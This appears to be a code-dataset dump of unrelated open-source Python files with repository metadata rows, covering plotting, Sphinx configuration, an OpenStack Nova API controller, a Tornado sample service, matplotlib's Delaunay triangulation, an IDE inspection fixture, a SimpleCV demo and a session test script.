for i in numpy.linspace(floor(maxY * 10 ** scale) / 10 ** scale, ceil(minY * 10 ** scale) / 10 ** scale,
int(floor((floor(maxY * 10 ** scale) - ceil(minY * 10 ** scale)) / step)) + 1):
Y = (i - minY) / spanY * pheight + voffset
c.stroke(path.line(hoffset, Y, hoffset - 0.05, Y))
if Y > voffset and Y < width:
c.stroke(path.line(hoffset, Y, width, Y), [color.gray(0.9)])
if i < 0.01:
label = '%0.3f' % i
if i < 0.1:
label = '%0.2f' % i
else:
label = '%0.1f' % i
c.text(hoffset - 0.1, Y, label, [text.halign.right, text.valign.middle, text.size(-2)])
if xaxis == 'res':
if dtype == 'q':
Y1 = (self.strict_qcutoff - minY) / spanY * pheight + voffset
Y2 = (self.loose_qcutoff - minY) / spanY * pheight + voffset
else:
Y1 = (self.strict_rcutoff - minY) / spanY * pheight + voffset
Y2 = (self.loose_rcutoff - minY) / spanY * pheight + voffset
c.stroke(path.line(hoffset, Y1, width, Y1), [style.linestyle.dashed])
c.stroke(path.line(hoffset, Y2, width, Y2), [style.linestyle.dotted])
c.insert(c1)
c.stroke(path.rect(hoffset, voffset, pwidth, pheight))
return c
def _plot_line(self, Xs, Ys, width, minX, maxX, minY, maxY, pcolor=None):
if pcolor is None:
pcolor = color.rgb.black
spanX = maxX - minX
spanY = maxY - minY
hoffset = 0.9
voffset = 0.6
pwidth = width - hoffset
pheight = width - voffset
c = canvas.canvas([canvas.clip(path.rect(hoffset, voffset, pwidth, pheight))])
order = numpy.argsort(Xs)
xs = (numpy.log2(Xs[order]) - minX) / spanX * pwidth + hoffset
ys = (Ys[order] - minY) / spanY * pheight + voffset
lpath = path.path(path.moveto(xs[0], ys[0]))
for i in range(1, xs.shape[0]):
lpath.append(path.lineto(xs[i], ys[i]))
c.stroke(lpath, [pcolor])
return c
def _num2str(self, n):
s = []
n1 = str(n)
while len(n1) > 3:
s = [n1[-3:]] + s
n1 = n1[:-3]
if len(n1) > 0:
s = [n1] + s
return ','.join(s) | bxlab/hifive | hifive/quasar.py | Python | mit | 62,263 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import sphinx_py3doc_enhanced_theme
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.autosummary',
'sphinx.ext.coverage',
'sphinx.ext.doctest',
'sphinx.ext.extlinks',
'sphinx.ext.ifconfig',
'sphinx.ext.napoleon',
'sphinx.ext.todo',
'sphinx.ext.viewcode',
]
source_suffix = '.rst'
master_doc = 'index'
project = 'Darkslide'
year = '2015-2021'
author = 'Ionel Cristian Mărieș'
copyright = '{0}, {1}'.format(year, author)
version = release = '6.0.0'
pygments_style = 'trac'
templates_path = ['.']
extlinks = {
'issue': ('https://github.com/ionelmc/python-darkslide/issues/%s', '#'),
'pr': ('https://github.com/ionelmc/python-darkslide/pull/%s', 'PR #'),
}
html_theme = "sphinx_py3doc_enhanced_theme"
html_theme_path = [sphinx_py3doc_enhanced_theme.get_html_theme_path()]
html_theme_options = {
'githuburl': 'https://github.com/ionelmc/python-darkslide/'
}
html_use_smartypants = True
html_last_updated_fmt = '%b %d, %Y'
html_split_index = False
html_sidebars = {
'**': ['searchbox.html', 'globaltoc.html', 'sourcelink.html'],
}
html_short_title = '%s-%s' % (project, version)
napoleon_use_ivar = True
napoleon_use_rtype = False
napoleon_use_param = False
| ionelmc/python-darkslide | docs/conf.py | Python | apache-2.0 | 1,275 |
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from webob import exc
from nova.api.openstack import common
from nova.api.openstack import wsgi
from nova.compute import api as compute
from nova import exception
from nova.policies import suspend_server as ss_policies
class SuspendServerController(wsgi.Controller):
def __init__(self):
super(SuspendServerController, self).__init__()
self.compute_api = compute.API()
@wsgi.response(202)
@wsgi.expected_errors((404, 409))
@wsgi.action('suspend')
def _suspend(self, req, id, body):
"""Permit admins to suspend the server."""
context = req.environ['nova.context']
server = common.get_instance(self.compute_api, context, id)
try:
context.can(ss_policies.POLICY_ROOT % 'suspend',
target={'user_id': server.user_id,
'project_id': server.project_id})
self.compute_api.suspend(context, server)
except (exception.OperationNotSupportedForSEV,
exception.InstanceIsLocked) as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'suspend', id)
@wsgi.response(202)
@wsgi.expected_errors((404, 409))
@wsgi.action('resume')
def _resume(self, req, id, body):
"""Permit admins to resume the server from suspend."""
context = req.environ['nova.context']
context.can(ss_policies.POLICY_ROOT % 'resume')
server = common.get_instance(self.compute_api, context, id)
try:
self.compute_api.resume(context, server)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'resume', id)
| rahulunair/nova | nova/api/openstack/compute/suspend_server.py | Python | apache-2.0 | 2,596 |
#!/usr/bin/env python
"""
Sample rest service for mod_log_rest
Author: Brendon Crawford <brendon@last.vc>
"""
import json
import logging
import uuid
from tornado.ioloop import IOLoop
from tornado.web import RequestHandler, Application
import settings
logging.basicConfig(level=logging.INFO)
def main():
"""
Main
Returns: int
"""
application = Application(_routes())
application.listen(settings.LISTEN_PORT, settings.LISTEN_HOST)
IOLoop.instance().start()
return 0
def _routes():
"""
Define URL routes
Returns: list
List of tuples
"""
out = [
(r'/messages/add/?', AdderHandler)
]
return out
class Handler(RequestHandler):
"""
Handler Super Class for App
"""
def dump(self, status, req_type, **val):
out = val
out['status'] = status
out['req_type'] = req_type
out['response_id'] = uuid.uuid4().hex
return self.write(json.dumps(val))
class AdderHandler(Handler):
"""
Handler to Add New Nodes
"""
def post(self):
"""
Get Request
Returns: bool
"""
subject = None
body = None
from_jid = None
to_jid = None
if self.request.arguments.has_key('subject'):
subject = self.get_argument('subject')
if self.request.arguments.has_key('body'):
body = self.get_argument('body')
if self.request.arguments.has_key('from_jid'):
from_jid = self.get_argument('from_jid')
if self.request.arguments.has_key('to_jid'):
to_jid = self.get_argument('to_jid')
self.act(from_jid, to_jid, body, subject)
self.dump(100, 1)
return True
def act(self, from_jid, to_jid, body, subject):
"""
Perform action
"""
logging.info("ADD:\nfrom_jid:%s\nto_jid:%s\nsubject:%s\nbody:%s\n" % \
(from_jid, to_jid, subject, body))
return True
if __name__ == "__main__":
exit(main())
| brendoncrawford/ejabberd_mod_log_rest | web/application.py | Python | lgpl-2.1 | 2,060 |
#!/usr/bin/env python
# Scans twitter for trending terms, populates a database with the results and
# then creates a json file showing trends based on the data
import CreateJson as j
import TwitterSearch as t
import KeywordSearch as k
import Log as l
import logging
ProcessResult = False
FN_NAME = "TrendingTermsSentiment"
logging.basicConfig(filename='TwitterMetrics_Sentiment.log', format='%(asctime)s %(levelname)s: %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p', level=logging.INFO)
logging.info('%s - Process Start', FN_NAME)
TimeStamp = l.CreateTimeStamp()
if t.ScanTwitter(TimeStamp) == True:
if k.SearchTweetsForKeywords(TimeStamp) == True:
ProcessResult = True
else:
logging.warning('%s - Function SearchTweetsForKeywords in KeywordSearch module failed to run correctly', FN_NAME)
else:
logging.warning('%s - Function ScanTwitter in TwitterSearch module failed to run correctly', FN_NAME)
logging.info('%s - Process complete with status %s', FN_NAME, ProcessResult)
| AdamDynamic/TwitterMetrics | TrendingTermsSentiment.py | Python | gpl-2.0 | 1,025 |
import warnings
# 2.3 compatibility
try:
set
except NameError:
import sets
set = sets.Set
import numpy as np
from matplotlib._delaunay import delaunay
from .interpolate import LinearInterpolator, NNInterpolator
__all__ = ['Triangulation', 'DuplicatePointWarning']
class DuplicatePointWarning(RuntimeWarning):
"""Duplicate points were passed in to the triangulation routine.
"""
class Triangulation(object):
"""A Delaunay triangulation of points in a plane.
Triangulation(x, y)
x, y -- the coordinates of the points as 1-D arrays of floats
Let us make the following definitions:
npoints = number of points input
nedges = number of edges in the triangulation
ntriangles = number of triangles in the triangulation
point_id = an integer identifying a particular point (specifically, an
index into x and y), range(0, npoints)
edge_id = an integer identifying a particular edge, range(0, nedges)
triangle_id = an integer identifying a particular triangle
range(0, ntriangles)
Attributes: (all should be treated as read-only to maintain consistency)
x, y -- the coordinates of the points as 1-D arrays of floats.
circumcenters -- (ntriangles, 2) array of floats giving the (x,y)
coordinates of the circumcenters of each triangle (indexed by a
triangle_id).
edge_db -- (nedges, 2) array of point_id's giving the points forming
each edge in no particular order; indexed by an edge_id.
triangle_nodes -- (ntriangles, 3) array of point_id's giving the points
forming each triangle in counter-clockwise order; indexed by a
triangle_id.
triangle_neighbors -- (ntriangles, 3) array of triangle_id's giving the
neighboring triangle; indexed by a triangle_id.
The value can also be -1 meaning that that edge is on the convex hull
of the points and there is no neighbor on that edge. The values are
ordered such that triangle_neighbors[tri, i] corresponds with the edge
*opposite* triangle_nodes[tri, i]. As such, these neighbors are also
in counter-clockwise order.
hull -- list of point_id's giving the nodes which form the convex hull
of the point set. This list is sorted in counter-clockwise order.
Duplicate points.
If there are no duplicate points, Triangulation stores the specified
x and y arrays and there is no difference between the client's and
Triangulation's understanding of point indices used in edge_db,
triangle_nodes and hull.
If there are duplicate points, they are removed from the stored
self.x and self.y as the underlying delaunay code cannot deal with
duplicates. len(self.x) is therefore equal to len(x) minus the
number of duplicate points. Triangulation's edge_db, triangle_nodes
and hull refer to point indices in self.x and self.y, for internal
consistency within Triangulation and the corresponding Interpolator
classes. Client code must take care to deal with this in one of
two ways:
1. Ignore the x,y it specified in Triangulation's constructor and
use triangulation.x and triangulation.y instead, as these are
consistent with edge_db, triangle_nodes and hull.
2. If using the x,y the client specified then edge_db,
triangle_nodes and hull should be passed through the function
to_client_point_indices() first.
"""
def __init__(self, x, y):
self.x = np.asarray(x, dtype=np.float64)
self.y = np.asarray(y, dtype=np.float64)
if self.x.shape != self.y.shape or len(self.x.shape) != 1:
raise ValueError("x,y must be equal-length 1-D arrays")
self.old_shape = self.x.shape
duplicates = self._get_duplicate_point_indices()
if len(duplicates) > 0:
warnings.warn(
"Input data contains duplicate x,y points; some values are "
"ignored.",
DuplicatePointWarning,
)
# self.j_unique is the array of non-duplicate indices, in
# increasing order.
self.j_unique = np.delete(np.arange(len(self.x)), duplicates)
self.x = self.x[self.j_unique]
self.y = self.y[self.j_unique]
else:
self.j_unique = None
# If there are duplicate points, need a map of point indices used
# by delaunay to those used by client. If there are no duplicate
# points then the map is not needed. Either way, the map is
# conveniently the same as j_unique, so share it.
self._client_point_index_map = self.j_unique
self.circumcenters, self.edge_db, self.triangle_nodes, \
self.triangle_neighbors = delaunay(self.x, self.y)
self.hull = self._compute_convex_hull()
def _get_duplicate_point_indices(self):
"""Return array of indices of x,y points that are duplicates of
previous points. Indices are in no particular order.
"""
# Indices of sorted x,y points.
j_sorted = np.lexsort(keys=(self.x, self.y))
mask_duplicates = np.hstack([
False,
(np.diff(self.x[j_sorted]) == 0) &
(np.diff(self.y[j_sorted]) == 0),
])
# Array of duplicate point indices, in no particular order.
return j_sorted[mask_duplicates]
def _compute_convex_hull(self):
"""Extract the convex hull from the triangulation information.
The output will be a list of point_id's in counter-clockwise order
forming the convex hull of the data set.
"""
border = (self.triangle_neighbors == -1)
edges = {}
edges.update(dict(zip(self.triangle_nodes[border[:, 0]][:, 1],
self.triangle_nodes[border[:, 0]][:, 2])))
edges.update(dict(zip(self.triangle_nodes[border[:, 1]][:, 2],
self.triangle_nodes[border[:, 1]][:, 0])))
edges.update(dict(zip(self.triangle_nodes[border[:, 2]][:, 0],
self.triangle_nodes[border[:, 2]][:, 1])))
# Take an arbitrary starting point and its subsequent node
hull = list(edges.popitem())
while edges:
hull.append(edges.pop(hull[-1]))
# hull[-1] == hull[0], so remove hull[-1]
hull.pop()
return hull
def to_client_point_indices(self, array):
"""Converts any array of point indices used within this class to
refer to point indices within the (x,y) arrays specified in the
constructor before duplicates were removed.
"""
if self._client_point_index_map is not None:
return self._client_point_index_map[array]
else:
return array
def linear_interpolator(self, z, default_value=np.nan):
"""Get an object which can interpolate within the convex hull by
assigning a plane to each triangle.
z -- an array of floats giving the known function values at each point
in the triangulation.
"""
z = np.asarray(z, dtype=np.float64)
if z.shape != self.old_shape:
raise ValueError("z must be the same shape as x and y")
if self.j_unique is not None:
z = z[self.j_unique]
return LinearInterpolator(self, z, default_value)
def nn_interpolator(self, z, default_value=np.nan):
"""Get an object which can interpolate within the convex hull by
the natural neighbors method.
z -- an array of floats giving the known function values at each point
in the triangulation.
"""
z = np.asarray(z, dtype=np.float64)
if z.shape != self.old_shape:
raise ValueError("z must be the same shape as x and y")
if self.j_unique is not None:
z = z[self.j_unique]
return NNInterpolator(self, z, default_value)
def prep_extrapolator(self, z, bbox=None):
if bbox is None:
bbox = (self.x[0], self.x[0], self.y[0], self.y[0])
minx, maxx, miny, maxy = np.asarray(bbox, np.float64)
minx = min(minx, np.minimum.reduce(self.x))
miny = min(miny, np.minimum.reduce(self.y))
maxx = max(maxx, np.maximum.reduce(self.x))
maxy = max(maxy, np.maximum.reduce(self.y))
M = max((maxx - minx) / 2, (maxy - miny) / 2)
midx = (minx + maxx) / 2.0
midy = (miny + maxy) / 2.0
xp, yp = np.array([[midx + 3 * M, midx, midx - 3 * M],
[midy, midy + 3 * M, midy - 3 * M]])
x1 = np.hstack((self.x, xp))
y1 = np.hstack((self.y, yp))
newtri = self.__class__(x1, y1)
# do a least-squares fit to a plane to make pseudo-data
xy1 = np.ones((len(self.x), 3), np.float64)
xy1[:, 0] = self.x
xy1[:, 1] = self.y
from numpy.dual import lstsq
c, res, rank, s = lstsq(xy1, z)
zp = np.hstack((z, xp * c[0] + yp * c[1] + c[2]))
return newtri, zp
def nn_extrapolator(self, z, bbox=None, default_value=np.nan):
newtri, zp = self.prep_extrapolator(z, bbox)
return newtri.nn_interpolator(zp, default_value)
def linear_extrapolator(self, z, bbox=None, default_value=np.nan):
newtri, zp = self.prep_extrapolator(z, bbox)
return newtri.linear_interpolator(zp, default_value)
def node_graph(self):
"""Return a graph of node_id's pointing to node_id's.
The arcs of the graph correspond to the edges in the triangulation.
{node_id: set([node_id, ...]), ...}
"""
g = {}
for i, j in self.edge_db:
s = g.setdefault(i, set())
s.add(j)
s = g.setdefault(j, set())
s.add(i)
return g
| alephu5/Soundbyte | environment/lib/python3.3/site-packages/matplotlib/delaunay/triangulate.py | Python | gpl-3.0 | 9,923 |
from collections import namedtuple
MyTup1 = namedtuple(<warning descr="Unexpected argument">bar=''</warning><warning descr="Parameter 'field_names' unfilled"><warning descr="Parameter 'typename' unfilled">)</warning></warning>
MyTup2 = namedtuple("MyTup2", "bar baz")
class MyTup3(namedtuple(<warning descr="Unexpected argument">bar=''</warning><warning descr="Parameter 'field_names' unfilled"><warning descr="Parameter 'typename' unfilled">)</warning></warning>):
pass
class MyTup4(namedtuple("MyTup4", "bar baz")):
pass
# empty
MyTup2(<warning descr="Parameter 'bar' unfilled"><warning descr="Parameter 'baz' unfilled">)</warning></warning>
# one
MyTup2(bar=''<warning descr="Parameter 'baz' unfilled">)</warning>
MyTup2(baz=''<warning descr="Parameter 'bar' unfilled">)</warning>
# two
MyTup2('', '')
MyTup2(bar='', baz='')
MyTup2(baz='', bar='')
# three
MyTup2(bar='', baz='', <warning descr="Unexpected argument">foo=''</warning>)
MyTup2('', '', <warning descr="Unexpected argument">''</warning>)
# empty
MyTup4(<warning descr="Parameter 'bar' unfilled"><warning descr="Parameter 'baz' unfilled">)</warning></warning>
# one
MyTup4(bar=''<warning descr="Parameter 'baz' unfilled">)</warning>
MyTup4(baz=''<warning descr="Parameter 'bar' unfilled">)</warning>
# two
MyTup4('', '')
MyTup4(bar='', baz='')
MyTup4(baz='', bar='')
# three
MyTup4(bar='', baz='', <warning descr="Unexpected argument">foo=''</warning>)
MyTup4('', '', <warning descr="Unexpected argument">''</warning>)
| paplorinc/intellij-community | python/testData/inspections/PyArgumentListInspection/initializingCollectionsNamedTuple.py | Python | apache-2.0 | 1,506 |
#!/usr/bin/python
import time
from SimpleCV import *
def check_eyes(eyes):
return (eyes and len(eyes) >= 2)
def process_eyes(image, eyes):
dx, dy = eyes[-1].coordinates() - eyes[-2].coordinates()
if dx > 0:
right_eye = eyes[-2]
else:
dx = -1*dx
right_eye = eyes[-1]
if dx > image.width/15: #Reduces amount of wrong matches
return (dx, dy, right_eye)
else:
return (None, None, None)
def draw_glasses(image, (dx, dy, right_eye), glasses):
rotation = 0.5*dy
try:
new_glasses = glasses.scale(int(2.75*dx), right_eye.height())
mask = new_glasses.invert()
new_glasses = new_glasses.rotate(rotation, fixed = False)
mask = mask.rotate(rotation, fixed=False)
image = image.blit(new_glasses, right_eye.topLeftCorner(),alphaMask=mask)
except:
pass
return image.flipHorizontal()
def main():
glasses = Image('deal_with_it.png', sample=True).flipHorizontal()
c = Camera()
found = False
while True:
image = c.getImage().scale(0.5).flipHorizontal()
eyes = image.findHaarFeatures("eye")
if check_eyes(eyes):
new_position = process_eyes(image, eyes)
if new_position[0]:
found = True
position = new_position
if found:
image = draw_glasses(image, position, glasses)
else:
image = image.flipHorizontal()
image.show()
if __name__ == "__main__":
main()
| sightmachine/SimpleCV | SimpleCV/examples/detection/dealwithit.py | Python | bsd-3-clause | 1,525 |
#!/usr/bin/env python
from create import create_account
from login import login
from request import toto_request
from uuid import uuid4
def checkresponse(response):
if 'error' in response:
print response['error']
exit()
return response
def verify_count(response, n):
response = checkresponse(response)
if n != response['result']['count']:
print 'Counter not incrementing, expected %s got %s' % (n, response['result']['count'])
print response
exit()
return response
user_id = uuid4().hex
password = uuid4().hex
print "user_id: %s password: %s" % (user_id, password)
print checkresponse(create_account(user_id, password))
session = {}
execfile('session.conf', session, session)
print verify_count(toto_request('increment', session=session), 1)
print verify_count(toto_request('increment', session=session), 2)
print verify_count(toto_request('increment', session=session), 3)
're-authenticate'
print checkresponse(login(user_id, password))
session = {}
execfile('session.conf', session, session)
print verify_count(toto_request('increment', session=session), 1)
print verify_count(toto_request('increment', session=session), 2)
print verify_count(toto_request('increment', session=session), 3)
print 'new user'
user_id = uuid4().hex
password = uuid4().hex
print "user_id: %s password: %s" % (user_id, password)
print checkresponse(create_account(user_id, password))
session = {}
execfile('session.conf', session, session)
print verify_count(toto_request('increment', session=session), 1)
print verify_count(toto_request('increment', session=session), 2)
print verify_count(toto_request('increment', session=session), 3)
're-authenticate'
print checkresponse(login(user_id, password))
session = {}
execfile('session.conf', session, session)
print verify_count(toto_request('increment', session=session), 1)
print verify_count(toto_request('increment', session=session), 2)
print verify_count(toto_request('increment', session=session), 3)
print 'Session storage ok'
| JeremyOT/Toto | templates/toto/simple/scripts/test_server.py | Python | mit | 1,998 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.